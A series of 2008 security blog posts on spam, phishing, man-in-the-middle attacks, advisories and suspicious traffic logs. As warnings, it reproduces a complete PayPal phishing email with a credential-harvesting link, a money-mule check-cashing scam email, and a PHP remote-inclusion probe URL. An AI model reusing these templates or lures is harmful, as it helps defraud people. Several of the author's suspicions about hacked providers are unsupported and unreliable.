Depending on how sql identifiers are set in sql 2000, certain SQL injection hacks related to what is explained here may be a problem:

http://www.sqlteam.com/article/quoted-identifiers-in-sql-server-2000

Apnic IP reports US address

This IP Range should be moved to Arin or fixed to indicate the correct location:

Inetnum: 203.187.128.0 - 203.187.159.255
netname: INFONET-AP-02
descr: BT-Infonet, Internet Service Provider
descr: 2160 E. Grand Ave. El Segundo, CA90245
country: US

Spam Viruses on the Rise

Google reports that Spam Viruses are on the rise in this report from eweek:

Spam Viruses on the Rise

And on that note I must say my mailbox is even more full of spam messages with attachments and the particularly spammed mailbox is on a bunch of social networking and job related web sites and a few user group mailing lists, and of course mailing lists like eweek and other Internet industry mailing lists.

Other than that I barely use that email address for communication anymore due to all the problems.

So is all this spam the result of putting my name on some social networking site somewhere?

As a matter of fact I tried out Facebook for a while just to see what all the hubbub was about and I got sent so many of these stupid applications and postings from friends that I just did not believe were legitimately from my friends. I would see that two random and unrelated people were challenged to a game, for instance or received a similar post and I started to wonder if some of those things were fake. I'm sure they were, but basically I never clicked on any of them (sorry all you facebook friends out there) because I know that these apps from random sites could contain things that are harmful to my computer and who knows what is in them or where they came from...and even the ones I did sign up for from bigger name software makers I wondered about.

So yeah, I really believe this and I wonder if the makers of some of the executive type social networking sites are actually using that information illegally - or those systems are getting hacked for that purpose, which is why in part I do not fully use them.

Wednesday, March 12, 2008

Top 10 Web Vulnerabilities - Q4 2007

Report of top 10 web vulnerabilities - Q4 2007 states that 29% of vulernabilities are attributable to network and infrastructure, while 71% are attributable to both open source and commercial web applications.

PHP represents 30% of all vulnerabilities. Ahem. I have mentioned this before and I still think PHP is a majorly hacked platform because people think it is "easy and cheap" and well, yes, until you get hacked. That's not to say PHP cannot be secure. It's just that the relative ease of tacking together an application that can be blown over in the wind makes it attractive for use by people who want to think they are programmers without understanding the underlying fundamentals of programming, software, web applications or security.

But then, there are many other serious applications, vendors and open source tools that have been hacked on the top 10 list, such as the #1 issue - OpenSSL - a technology meant to encrypt your data in transit as a means of security.

Spyware Developer Pays $330,000 +

Spyware developer / hacker pays for creating spyware that infected millions of computers.

Cisco Will Send Patches On Routine Basis

Cisco to patch routers on regular schedule, 03/11/2008 Following the lead of Microsoft and Oracle, Cisco Systems will start releasing security patches for some of its products on a schedule.

Friday, March 07, 2008

Critcal Java Security Patches

Secunia has a bunch of Java updates today for an issue that can cause remote code execution and DOS:

http://secunia.com/advisories/29239/

Wednesday, March 05, 2008

Old Browsers Are Security Risk

This is probably old news for most people but if someone is using an old browser in some cases it may be that an SSL certificate will not deliver 128 bit encryption. Here's the info from Verisign's web site:

Even though an SSL Certificate is capable of 128-bit or 256-bit encryption, many millions still use older computer systems that are incapable of strong encryption. (Building Blocks of Transparent Web Security: Server-Gated Cryptography, Yankee Group, 2005.) These legacy browsers and operating systems fail to step up to strong encryption without an SGC-enabled SSL Certificate:

Certain Internet Explorer browser versions from 4.01 to 5.01
Certain Netscape browser versions from 4.07 to 4.72
Many Windows 2000 systems using Internet Explorer
Internet Explorer browser versions prior to 3.02 and Netscape browser versions prior to 4.02 are not capable of 128-bit encryption with any SSL Certificate.


Verisign SSL Information

Choices are to use that way overpriced green bar SSL certificate that many vendors are not yet adopting, or block out old browsers from your web server and ask them to upgrade. The latter is not fool-proof but if someone wants to let their data get hacked that is their own problem.

Your virus scanner can't find this one...

Here's a root kit that is nearly impossible to detect:

Mebroot Root Kit

And once again, the infamous IT experts all over this country said this type of thing was hypothetically possible but beyond the reach of most malware writers.

Verisign says 5000 people were discovered to be infected since this was discovered in December.

And check out what you have to do to detect it.

This thing can be installed onto your machine in a drive by visit to a web site.

Thursday, February 28, 2008

Use SSL When Available - Browser Setting

It would be safer if you could force your browser to use SSL whenever available and alert you if the SSL encryption level being used is a version that has some security limitations and can potentially be hacked.

As far as I know this doesn't exist other than forcing ALL sites into SSL which is not very convenient.

Most banks now are forcing users into SSL for ALL web browsing - this is something I think more people should do and someone needs to implement a better way to discover and block invalid certs - and also track down the people doing it and prosecute them.

SSL is the only way I know of to verify you're at the site you think you're at that is stadard in all browsers. If you use http, could be your DNS cache is poisoned or you're using a cached copy or...?

This area of web browsing definitely needs to be improved.

Wednesday, February 27, 2008

Paypal Spoof

Return-Path:
X-Original-To: x@x.com
Delivered-To: x@x.com
Received: from p1119-ipbf09daianji.nara.ocn.ne.jp (p1119-ipbf09daianji.nara.ocn.ne.jp [221.187.221.119])
by mail14.intermedia.net (Postfix) with ESMTP id 6977443A9E;
Wed, 27 Feb 2008 08:34:16 -0800 (PST)
Received: from [221.187.221.119] by abralise.com; Thu, 28 Feb 2008 01:47:43 +0900
Date: Thu, 28 Feb 2008 01:47:43 +0900
From: update@paypal.com
X-Mailer: The Bat! (v2.12.00) Personal
Reply-To: akstcabralisemnsdgs@abralise.com
X-Priority: 3 (Normal)
Message-ID: <709683931.16551075140727@abralise.com>
To: x@x.com
Subject: PayPal® Account Review Department
MIME-Version: 1.0
Content-Type: text/html;
charset=Windows-1252
Content-Transfer-Encoding: 7bit

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML><HEAD><TITLE></TITLE>
</HEAD>
<BODY>

<style type="text/css">
<!--
style3 {font-size: 14px}
style4 {font-size: 12px; }
-->
</style>
<table width="522" border="0">
<tr>
<td><a href="https://www.paypal.com"><img src="https://www.paypal.com/images/paypal_logo.gif" width="117" height="35" border="0" /></a></td>
</tr>
<tr>
<td width="516"><P class="style3">Dear <strong>PayPal ®</strong> customer,</P>
<P class="style3">We recently reviewed your account, and we suspect an unauthorized transaction on your account.<BR>
Protecting
your account is our primary concern. As a preventive measure we
have temporary<strong> limited</strong> your access to sensitive information.<BR>
Paypal features.To ensure that your account is not compromised, simply hit
"<strong>Resolution
Center</strong>" to confirm your identity as member of
Paypal.</P>
<ul class="style3">
<li> Login to your Paypal with
your Paypal username and password.</U></li>
<li> Confirm your identity as a card memeber of
Paypal.</U></li>
</ul>
<P class="style3"> </P>
<TABLE cellSpacing=0 cellPadding=5 width="100%" align=center
bgColor=#ffeeee>
<TBODY>
<TR>
<TD class="style3"><SPAN class=emphasis>Please confirm account information by clicking here <A
href="http://paypal-user-confirm.com/acc/login.php "target="_self">Resolution
Center</A> and complete the "Steps to Remove Limitations." </SPAN></TD>
</TR>
</TBODY>
</TABLE>
<P class="style4"> </P>
<P class="style4"><strong>*</strong>Please do not reply to this message. Mail sent to this
address cannot be answered.</P>
<P><span class="style
<P><span class="style3">Copyright © 1999-2007 PayPal. All rights reserved.<BR>

</BODY></HTML>

VMWare Hack

There's a vulnerability in VMWare - a program a lot of testers use to test software applications among other things.

VMWare Hack

February 24, 2008 (Computerworld) A critical vulnerability in VMware Inc.'s virtualization software for Windows lets attackers escape the "guest" operating system and modify or add files to the underlying "host" operating system, the company has acknowledged.

As of Sunday, there was no patch available for the flaw, which affects VMware's Windows client virtualization programs, including Workstation, Player and ACE. The company's virtual machine software for Windows servers and for Mac- and Linux-based hosts are not at risk.

Sunday, February 24, 2008

Open Dns Resolvers - Problem

Open DNS Resolvers are a problem according to this article:

Open DNS Resolver Survey

This list shows the open resolvers - many of which are on networks that have been causing us prolems:

Open DNS Resolvers

Pondering favicon.ico

When someone requests the favico on a site a full request with complete information is not sent (apparently) Is this expected behaior? I guess I need to see the W3C spec for proper submission of requests and how it relates to multiple files requested by the same request. Does the first request include the full request information and subsequent related requests such as images, etc. come through with less than complete information? And is this useful for hackers in hiding particular details of their activities? More research is needed. Just pondering the implications of this particular request behavior.

Also I just realized while digging into this issue that my application was not thread safe and there is a trade off between making it thread safe to ensure no data is lost and keeping performance at optimal levels. Ugh. All this because of a favicon.ico request.

Saturday, February 23, 2008

Frequent JavaScript Errors on Major Web Sites

I have been seeing more and more JavaScript errors on all kinds of web sites.

I wonder if the owners of these web sites don't notice the errors because they have turned off JavaScript error reporting in their browsers (if you care about your security and your web site I would recommend not doing this and report any errors you find to the owner of the web site).

The other option is, the owner of the web site never sees the JavaScript error. Because JavaScript is a client side technology its execution will occur on the machine that is requesting the web site. If something is different on that machine then the web site owner may not see that error, unless they are testing every browser combination - and even if they are in the case of XSS and other client side attacks.

For instance I have some JavaScript that loads up some frames. I have one user that gets a bogus site when logging in and those frames are loaded up. That doesn't happen to any other user. Chances are that error is something specific to that computer or that network that I would never see had that person not reported the error.

That is why it is important for everyone to report any errors they see to the web sites they use regularly.

Sometimes the owners of the web site cannot see what you are seeing.

And on that note web site owners that support hundreds or millions of customers need to make their support staff aware that these things CAN and DO happen and not treat customers like morons who report them because the staff is looking at the page and not seeing the same thing.

One other comment on this topic is that one site having this problem is using Urchin which has some JavaScript and an iframe containing who knows what. A lot of major web sites use Urchin and all sorts of software to track advertising and marketing. Many times the marketing staff demands to do these partnerships which put their customers at risk, and actually can hurt rather than help their business. I would suggest never include an iframe on any page other than static html and definitely not on a login page or e-commerce web site - and even then, an iframe can be used to change the content the user is getting in the main page on a static site - so I would personally never use one with content hosted by a third party and/or code that is not highly scrutinized by security experts - not the average web developer. Also when using Urchin, etc. it is crucial to constantly test an monitor - client side, not just server side code execution. Also hackers are smart enough not to send their malicious code to your monitoring system in many cases.

Prefix Hijacking and Intercepting (MITM Attack)

Here's a paper by some students on prefix hijacking and how that can lead to a man in the middle attack.

Make sure you are using the latest version of Adobe Acrobat Reader before opening any PDF files.

Prefix Hijacking - Man In The Middle Attack

Contracting On Insecure Computers

Every time I get on a new assignment at a new company the first thing I have to do - every time - for any company large or small, is secure my computer. Each time I go in it seems like firewalls are off and patches are severely out of date, insecure end of life or out of date software is running (including Flash, Quicktime, etc). The one thing I cannot always do is turn off all unneeded services because I am not sure what is and is not required by the company but typically there are some that I know can be turned off which are hack-prone.

If this happens at even some of the biggest companies that tells you IT has a big problem. Machines are set up with insecure configurations and even if they are not - if someone leaves their desk with the machine logged in - someone else could jump on there and install some computer software as soon as you walk away. For instance at one company they had me log in and then go get coffee on a machine that was right next to another contractor I didn't know. Perhaps the guy is the greatest guy ever, but he's a contractor right? What if as soon as we walked away he jumped on my machine and installed something that gave him a back door into my machine??

Don't assume I am just paranoid. Read the security articles across web sites as I do every day and then tell me it is not possible. The number one source of security breaches is from internal employees - whether malicious, on purpose, or someone just trying to sabotage or skim.

Personally I think all employees should be told to lock their computer when away from their desk.

One company I was at had Ubuntu and that actually made me nervous because I wasn't quite sure how to secure Ubuntu as well as Windows. And since Ubuntu is made by some guy in South Africa and open source, how is this thing being audited for security? I have no idea.

But then if a company uses Microsoft products and doesn't install service packs until after they've been out for almost a year, might as well use Ubuntu. It's free.

IT Admins Should Be Checking Vulnerabilities Daily

Anyone working in IT supporting any systems that could possibly be hacked (which means anything) should be reading this list:

Secunia - Security Updates


Wednesday, February 20, 2008

HackerSafe - False sense of Security

This article suggests HackerSafe may lull web site owners into a false sense of security:

Hacker Safe - false sense of security

HackerSafe only tests a particular layer of hacking and as one consulting firm suggests, cannot provide in depth page by page testing of a company doing the work hands on. Additionally the article states that some hackers claim they have hacked hackersafe sites.

Ethical Hacking - Articles

Here's a whole list of articles from the Ethical Hacking web site which cover a wide range of hacker related topics from rootkits to data embedded in jpgs - wireless hot spots to audio and video and hacking the stack among other things:

Ethical Hacker Articles

More on Man-In-The-Middle Attacks

More on man in the middle attacks, on VPNS, banking sites, hot spots and more.

Man in the middle attack

Don't accept invalid certificates at a hot spot

This article shows hot spot exploits...and ways to validate SSID's however how many people actually do that...

http://www.ethicalhacker.net/content/view/66/24/

This is kind of scary for anyone using a hot spot.

The question is...what can Starbucks and T-mobile (among other popular hot spots) due to protect users of hotspots from this type of attack?

Tuesday, February 19, 2008

PHP hackers

Two related php hackers apparently referred by: http://www.delire.ru//modules/4nAlbum/public/doc/safe.txt?

61.250.95.201
inetnum: 61.248.0.0 - 61.255.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR



64.13.224.85
OrgName: Media Temple, Inc.
OrgID: MEDIAT-10
Address: 8520 National Blvd.
Address: Building A
City: Culver City
StateProv: CA
PostalCode: 90232
Country: US

NetRange: 64.13.192.0 - 64.13.255.255

Sunday, February 17, 2008

Tool for Phishers - Is your Browser Vulnerable?

It is a bit bothersome to me that this is not yet fixed:

http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/

Test your browser to see if you're a potential victim.

This could be used by phishers to pop up windows that look like links are pointing to valid sites when they are not, and trick someone into thinking they are at a bank for instance, instead of some hacker web site.

Not sure why this bug is not considered a top priority.

Tuesday, February 05, 2008

Facebook Image Uploader Exploit

This summary is not available. Please click here to view the post.

Saturday, February 02, 2008

Antivirus Comparison

Here is a comparison of antivirus programs for 2008

Not sure if the source is good (haven't researched this or heard of them) and make sure you read the legend or some things may be misleading.

http://www.sunbelt-software.com/ihs/alex/avtestresults_2D2008q1.pdf

Friday, February 01, 2008

Man-In-The-Middle Attack - Mail Systems

What are the chances your webmail is affected by a man-in-the-middle attack?

Today I found some instructions for my webmail company's product that did not match the product I see when I login.

I also found it odd when I signed up that certain features that were supposed to be in there were not and "their programmers" had to fix it.

Additionally the SSL certficate isn't working (should it be? Are we getting to an imposter?) and we cannot send mail without errors to one of their domains but they are telling us the messages are still encrypted - are they?

In the instructions I found online I went to the site that was supposed to be the admin site. I got a page not found. Then I typed in the IP - and the admin site showed up - but my admin password does not work on that site. It does work on their main web site however.

For another mail company I tried out I called them up on the phone because the whole login thing did not make sense. When I was asking the guy on the phone where and how to login, and option that he was seeing on his screen was simply not on my screen - and I talked to two different people that said the same thing and the instructions did not match what I was seeing.

What are the chances that all these webmail systems out there that people are using every day to communicate are hacked? Gmail was hacked - people could login and read gmail messages of other people - so it could be happening to a lot of other mail companies with less resources.

Wednesday, January 30, 2008

Man-In-The-Middle: How to test

I asked a friend who has been in the business of email administration for large corporations for quite a while how to test your mail system for a man-in-the-middle attack.

His answer was another catch 22 for these problems which leaves you stranded and once again proves why they are so successful - and could be happening on your mail or web system right now.

Basically, to find a man-in-the-middle attack you have to try out the hack on the server you are trying to test. The caveat is, if your server is already hacked the test might NOT work...

And basically he summed it up saying that's why there's so many security folks out there that help people test for this kind of thing.

I still don't know exactly how to test this on a mail system...have to keep researching...

Tuesday, January 29, 2008

Spam Images Bypassing Outlook Image Blocker

Some of the recent spam mentioned is getting past Microsoft's image blocker in Outlook. It is coming out of rush as the 70% spam post I just posted.

Monday, January 28, 2008

Report Cyber Crimes To FBI

I reported on this article before but reading it again I would like to highlight a different part - the FBI would like IT executives to report crimes to them to help fight crime. If large vendors would analyze their firewalls and network logs and report thing such as the spam I found spewing out of my server and research problems with had with their Email systems instead of kicking us off their systems, maybe we could uncover crimes and help the whole country, in fact the world, in addition to their individual businesses and customers:

FBI can Help You Fight Cyber Crime

O'Brien wound up his presentation with a plea for IT executives to work with the FBI to nail cybercriminals, including those who operate outside the United States.

"Compared to when I started doing computer crimes four or five years ago the bureau today is very well positioned to run an investigation that involves botnets and foreign nexus. We have agents in over 50 embassies now around the world from countries as diverse as the United Kingdom and Yemen...[Our agents] work with foreign law enforcement."

IT executives can help the FBI crack cases by reporting incidents as soon as possible and by sharing network and other logs, as well as IP addresses involved, O'Brien says.

Sunday, January 27, 2008

Is your home router hacked?

An example of an attacked home router is described in this article:

http://www.networkworld.com/news/2008/012208-drive-by-pharming.html

So if this is "on the rise" as the article points out, what can be done to stop it?

Phishing the Phishers

Here's a site with code to phish - but if you try to use it, ends up sending the info back to the people who wrote the code, not you:

http://news.netcraft.com/archives/2008/01/22/mrbrain_stealing_phish_from_fraudsters.html

So what is our government doing about this type of thing?

The infamous check cashing scam - again

Header followed by message text - this message is coming from Turkey, posing as a job for a company which entails cashing checks. Sound familiar?? Who hasn't heard of this one yet....

Return-Path:
X-Original-To: job@hunter.com
Delivered-To: job@hunter.com
Received: from dsl.static.85-105-31885.ttnet.net.tr (unknown [85.105.124.141])
by mail14.intermedia.net (Postfix) with ESMTP id 1B465439B1
for ; Fri, 25 Jan 2008 08:13:59 -0800 (PST)
Received: from [85.105.124.141] by edge2-3.sne1.net; Fri, 25 Jan 2008 18:38:55 +0200
From: "Gary Cramer"
To:
Subject: Job Center BOGATTO Company
Date: Fri, 25 Jan 2008 18:38:55 +0200
Message-ID: <01c85f81$89f4c980$8d7c6955@oxpogsog>
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.2300
Importance: Normal

The Bogatto Company has a current offering of part-time positions. Even if you are presently employed, this opportunity can add additional earnings to your Family budget!!! Here is a little information about our company:

Bogatto co-operates with more than 90 countries in Europe, North and South America, the Near East and Asia. Our company was founded 15 years ago. Today Bogatto has built up an excellent reputation based on stability and reliability. Activities for our company are various. We find firms or people and negotiate contracts with them. Bogatto is the guarantor between the employer and the employee, vendor and vendee, etc.

The fundamental nature of your job will primarily consist of the following:
We send you a check that you cash utilizing a check cashing service
You take the money from this check and send it to our agent (If our partner is in the USA, you send the money to him through Travel Express)
If our partner is not in the USA, it is necessary for you to use Western Union
Your salary will be 10% from the sum of every check.
The more checks you receive - the more money you earn. Moreover, if you collaborate with us successfully during your first month, you will get an increase in pay.
After 2 months of successful employment you will get bumped up to 20% from the sum of every check.


Many of our clients conduct business via checks. But financial institutions in other countries are either not always equipped and/or charge huge fees when transferring funds.

That's why Bogatto is in need of people who can help us solve this problem and while doing so, earn a decent salary! This creates a nice win-win situation for us both.

If you are interested in our offer or have any questions about this offer, please complete the following information attentively and in block letters:

Full name:
Address:
City:
State:
Zip:
Phone:
E-mail:

Please send your information via e-mail to: bogatto.information@gmail.com

Please, write your data correctly! The checks of our clients will be sent to your name and your address. If it is required we'll call you. If you agree, you will receive further instructions.

Thanks for your attention and best regards,

The Bogatto Company


Frequently Asked Questions

#1 Who will I get checks from?
You will receive checks from our clients who cannot send funds to another country but can only transfer funds by check within that country.
#2 How much will the wages compile?
Your wages will equal 10 percent from the sum of the check. In the other words you get the check, take 10 percent from the sum of the check and the remainder of the check is sent to our clients(ex: the sum of the check is 4,000 USD, you get 400 USD) you get the money this way from every check.
#3 Where is, the check cashed ?
Charges on cashing the check can be taken from this check. It would be better if you could cash the check on the day you receive it. To cash check fast you can use the offices "Check cashing service" "Check Cash Express" and others.
#4 Can cashing services be paid?
Yes, they can; Cashing services can be paid. In this case these services can be paid from the sum of the check.
#5 How is the money transferred by Western Union?
Information about the person who you need to send the money to will be highlighted in an e-mail sent to you. After you have transferred money by Western Union you will be given a MTCN (Money Control Transfer Number). It consist of 10 digits. Then you need to send this number to our e-mail on the same day.
#6 Where should the money be taken from to pay the Western Union fees?
The Western Union fees should be taken from the sum of the check.
#7 The Western Union system doesn't allow more than 3000 USD to be sent at at time?
If the sum of the transfer is more than 3000 USD then you must divide the sum into smaller transfers (it is obligatory) under the 3000 USD Limit. And as it was said above you need to tell us the MTCN s of the transfers.
#8 Can money be sent by another system?
No, it can't. Transfer can be done only by Western Union.
#9 Who will pay tax?
Sums of our checks are not more than 5000 USD. Reports are not sent to the IRS. Don't worry, you won't have to pay taxes on these sums of money.
#10 How many checks a month can you send and what sum of money?
We can send checks at a rate of 50,000 USD, and the quantity of the checks depends on their sum.
#11 Will the person have to go anywhere?
Your job won't be difficult, you won't have to go anywhere, you can do most everything from home and you don't need to invest money.
#12 Are the operation of the company legal?
All the operations of the company are legal and subject to International Judicial System, what is proved by appropriate documents.
#13 What is approximate wages?
Approximate wages a month is between 4000-5000 USD, with a minimum of time and effort.
#14 Who is responsible if the clients are not satisfied?
Our company is.
#15 Should we provide you with information about our bank account?
We don't need any information about your bank account..


-- Bogatto Company -- Contacts: 1-800-516-3170
support@bogatto.com

Wednesday, January 23, 2008

SSL and Man-In-The-Middle Attacks

Here is a lot of information on man in the middle attacks.

http://en.wikipedia.org/wiki/Man-in-the-middle_attack

I just wish I understood it better...and that more people would pay attention to and help stop this type of attack.

Before you buy that software...

Before you buy software check Secunia to see if there are any advisories on that software and how quickly they were fixed:

http://secunia.com/

Also check the true roots of the software maker and other products developed by that same company or a previous company with the same owner.

Check for third party, credible reviews of the software but also, don't believe everything you read. Do your homework and find out what other companies are using the software and who the reviewer is - related to the company? And is the reviewer technical enough to offer true advice on the software?

Make sure that reviews are not just of the features, but also of the underlying security of the product as well. A piece of software may look cool and have nifty features but also have a back door into your trusted environment.

Tuesday, January 22, 2008

Domain Registry of America - Shady Tactics

Domain Registry of America sends out letters to people long before their domains are up for renewal and tries to trick them into paying a "bill" which would actually transfer the domain to a new vendor. This needs to stop.

Sunday, January 20, 2008

Recent Spammer

Got an interesting email from this spammer IP recently: 83.98.156.20

I have a feeling this particular email is more than meets the eye.

Search Engine Spam - Report It

Have you been searching in Google and found garage looking web pages that all look the same and are what I would call "search engine spam"? There is obviously some company or set of companies that have purchased countless numbers of domain names that are not being really used other than to spit out a bunch of useless content and links on pages that all look basically the same and link back to other sites they are probably providing SEO service to...these sites are a waste of everyone's time and money. They are garbage sites full of links probably set up to help their customers improve seo rankings artificially, because obviously these sites are not very useful.

Examples:
http://artmam.net
http://dania.com

Next time you are searching in Google and come across a garbage site, make sure you report it. There is a link at the bottom of the list that says "disatisfied with results?" Click it and report these search engine spammer sites so they can get kicked out of the rankings.

Sunday, January 13, 2008

Login forms should be on HTTPS urls

This article is interesting - I especially like the part about why login pages should be https urls, not just the form you're submitting the login to...

http://blogs.msdn.com/ie/archive/2005/04/20/tls-and-ssl-in-the-real-world.aspx

Thursday, January 10, 2008

Horde Security Flaw

I've been noting problems with various webmail systems.

Here are some posts to backup what may be causing some of these problems, as I have noted most of the mail systems I've used are horde or php. These advisories came from Secunia today:

Horde:
http://secunia.com/advisories/28020/

PHP:
http://secunia.com/advisories/28393/

Now...will someone please look into these AJAX systems as well? Something seems a little fishy with some of those.

Saturday, January 05, 2008

Be Honest. Get Customers. What a Concept.

In light of all the things I have been writing here, about companies accepting responsibility for things going wrong and fixing them instead of sweeping them under the carpet, I find this to be an inspiring article for those companies still not convinced it is the best thing to do. I mean if you can't do it because it is the right thing to do, maybe you'll do it because you'll get more customers:

http://www.wired.com/wired/archive/15.04/wired40_ceo.html

Manta.com publishing inaccurate information

Manta.com is publishing completely bogus information about companies - information they have no way of knowing. Take a look at your company profile on Manta and in you find something that is inaccurate, report it to the search engines, the company and post it on your blog so this misuse of the web can be stopped.

Wednesday, December 12, 2007

Security Investment Opportunity

There are a lot of security vendors out there touting all kinds of security products from encrypting hard drives and emails to virus checking and spyware scanning, secure email products, and compliance auditing for those who have access to the systems directly.

However as far as I know, there is no good solution for monitoring and quickly pinpointing a man-in-the-middle attack.

This type of thing seems like it would require cooperation on both ends of a network. It may involve traces through networks and honeypots and traps to catch such attacks.

The more I think about it the more I think that is what is going on with our email service. But I cannot prove or disprove that fact because our email vendor, USA.net, will not help us resolve the problems.

Tuesday, December 11, 2007

Cisco Fraud Shut Down

Cisco theif shut down - one for the good guys.

http://www.networkworld.com/community/node/22850?nlhtsec=rn_121107&nladname=121107securityal

Don't the rest of us small businesses wish that we had the money and support to catch people hacking and stealing from us...

PCI Compliance

This company that recently moved their headquarters from Europe to Chicago and wants to get involved in PCI compliance testing of devices. This could be good or bad depending on the true motives of the people involved. I would love it if someone would step up and find and fix security flaws, as long as they are one of the good guys....

http://www.networkworld.com/news/2007/121007-nss-labs-pci.html?nlhtsec=rn_121107&nladname=121107securityal

Vendors trying to hide or ignore vulnerabilities

I agree with this article regarding vendors trying to sweep vulnerabilities under the rug:

Vendors trying to hide vulnerabilities

My beef in this whole blog lately is not that vendors have problems with their software - because hackers and foreign governments and organized crime rings are at war with us - but I do have a beef when vendors do not take responsibilities for problems and fix them.

I think the same applies to bugs, which may be nothing - or may be a shadow of a clue that a system is compromised in some way. Vendors should get to the bottom of bugs and in a technical, engineering approach, resolve or at least explain why a problem occurred if it is possible.

Recently I get the feeling that email hosting providers would rather kick a "whiny" customer off the system - who finds a flaw in their software - rather than take the time to get to the bottom of exactly what is causing the problem. In fact some of them turn around and blame the customer and tell them it was something they did that caused the problem even if they cannot prove it (and it is not true).

I had some employees like this in the past. A customer was complaining that her web site was failing randomly and they blamed the customer's computer and didn't really bother to ever truly research and pin down the problem. I finally had to let them go. The problem was a database server that was overloaded. An engineered approach to resolving the problem would have enlightened us all much sooner. I never blame a customer for the problem without the facts to provide a customer to show them that it looks like something they did caused the problem. If the customer denies they did that thing...maybe something else is still going on even if it looks like the customer did something to cause it.

My customer with a mac has nailed down the problem with USA.net's webmail program. The problem happens when she's using her mac - or any mac in the office - with a particular mail account (and no others). USA.net claims it is not their problem and that a system administrator changed something - no one on our end has touched anything. The Internet Service Provider came out and tested the modem - they claim there is nothing wrong with the network or the modem. All other web sites are operating just fine on these machines for this customer. USA.net has finally said they would escalate the problem. I doubt this will do any good however. This is probably all smoke to placate the customer until we move to a new email hosting provider. I'll let you know if it gets fixed before then.

What could be causing this problem? If someone is in the path between my customer and the email hosting vendor, perhaps they could do something to the request. Perhaps there is something in one of the emails in that account that is causing the problem. Perhaps there is some software glitch in Safari on a mac for that particular web site. The only way to pin this down is for the makers of the web site to check their logs and maybe add additional logging and perform some network traces to pin this down. If they won't do it, as far as I can tell we are out of luck.

Saturday, December 08, 2007

Small businesses don't protect their data

Here's a report about small businesses not protecting their data - they don't understand the risks and threats as a result of this...and vendors like the ones I have used are not helping. Sometimes I think their are people employed by large managed hosting companies that are related to the espionage mentioned in a previous article. And because small companies don't understand exactly what is going on or the risks involved - they don't complain about it like I do here.

Small business security

Security Threats - New levels of Sophistication

CRN magazine reports in November 26, 2007 article:

"Many security professionals dispute exactly what constitutes the most serious security threat. But almost all sources agree that over the past two to three years, the tactics cybercriminals are using have become amazingly professional. What was onece about bragging rights is now about high-stakes payoofs illigitimately gained by large-scale Internet fraud andinfiltration."

For more informaiton go to security threats

Top Spy Threat

Information week reports in an article entitled "The Techno-Spy Threat" in the Nov 27, 2008 article the following:

"Chinese spying is the top threat to U.S. technology, says the U.S.-China Economic Security Review Commision in it's 2007 Report to Congress.

China's espionage activities in the United States are so extensive that they comprise the single greatest risk to the security of American technologies, according to a summary of the report from the congressionally appointed gropu of experts. Espionage saves China the time and cost of researching and developing advanced technologies, it says."

Security Threats

Friday, December 07, 2007

Traffic Patterns - How Hackers Work

Here's how hackers are working their bots or whatever right now to generate traffic by hiting a site about 5-6 times in a row in groups from different IPs. These groups of IPs are related in more ways than one.

We have a site that gets very low traffic and pretty much has nothing linking to it and nobody looking at it. And yet somehow this site gets blocks of hits in a row out of nowhere - 5 or 6 at a time - then stops for another hour.

Here's an example:

12/7/2007 4:08:58 PM 218.234.21.33
12/7/2007 4:09:04 PM 68.189.175.164
12/7/2007 4:09:25 PM 24.0.54.125
12/7/2007 4:09:33 PM 207.172.248.72
12/7/2007 4:09:36 PM 70.236.22.31
12/7/2007 4:09:43 PM 70.236.22.31

Here's an exmaple of traffic from the Ukraine which is probably hackers hitting that same site:

80.91.186.250

inetnum: 80.91.186.0 - 80.91.186.255
netname: INTERCONNECTIONS-DATAGROUP
descr: Subnets /30 for interconnections to DATAGROUP's clients
country: UA

I'm guessing all these IPs are related bots and hackers that hit this site in Decemeber:

1 172.129.227.254 12
1 193.47.80.38 12
2 200.107.59.51 12
1 200.226.134.53 12
1 200.226.134.53 12
1 200.226.134.53 12
2 200.226.134.53 12
1 200.88.114.166 12
2 202.115.130.23 12
1 202.115.130.23 12
1 203.88.192.104 12
1 207.172.248.72 12
1 218.234.21.33 12
1 218.246.118.22 12
2 218.249.83.87 12
1 221.100.70.25 12
1 222.221.6.144 12
1 24.0.54.125 12
2 24.164.91.236 12
1 58.65.235.194 12
1 58.65.235.194 12
1 58.65.235.194 12
1 61.247.217.35 12
4 61.61.132.129 12
2 62.85.45.65 12
2 62.85.45.65 12
4 62.85.45.72 12
1 64.22.93.154 12
3 64.22.93.154 12
1 64.246.161.30 12
3 64.86.69.5 12
3 65.32.175.224 12
1 66.56.149.238 12
1 67.100.29.213 12
2 68.166.98.6 12
1 68.189.175.164 12
2 70.236.22.31 12
1 72.232.25.226 12
3 72.36.134.242 12
3 72.36.134.242 12
1 75.125.47.162 12
1 76.168.39.111 12
3 77.50.7.167 12
2 80.91.186.250 12
3 80.91.186.250 12
3 80.91.186.250 12
3 83.31.185.72 12
3 85.114.133.77 12
1 85.194.127.10 12
1 85.21.125.100 12
1 85.228.96.63 12
1 86.123.67.229 12
1 87.111.102.25 12
3 87.118.106.4 12
2 87.118.116.8 12
2 87.240.5.90 12
1 88.131.106.2 12
1 97.76.5.224 12

Here's the same type of traffic from November:

2 122.214.249.116 11
2 122.252.226.40 11
1 122.252.226.40 11
1 125.177.43.78 11
1 125.7.195.10 11
4 131.107.151.157 11
2 148.167.202.141 11
1 148.235.92.34 11
1 189.32.175.26 11
1 192.18.100.7 11
2 193.111.120.47 11
1 194.109.141.137 11
1 194.72.238.61 11
2 194.83.70.20 11
1 194.83.70.20 11
1 195.229.242.57 11
1 195.244.128.215 11
2 195.244.128.215 11
1 195.244.128.215 11
2 195.244.128.215 11
2 195.244.128.215 11
3 195.244.128.216 11
1 195.248.93.105 11
1 195.251.249.101 11
1 195.67.48.130 11
1 195.76.242.227 11
1 200.226.134.53 11
1 200.226.134.53 11
1 200.226.134.53 11
2 200.226.134.53 11
1 200.88.114.166 11
2 200.88.114.166 11
1 200.88.114.166 11
1 200.88.114.166 11
1 200.88.114.166 11
1 201.43.185.180 11
1 201.45.221.40 11
1 201.70.159.236 11
1 202.105.182.87 11
2 202.115.130.23 11
3 202.44.135.35 11
2 202.44.8.100 11
1 202.72.240.22 11
1 203.111.13.69 11
1 203.111.13.69 11
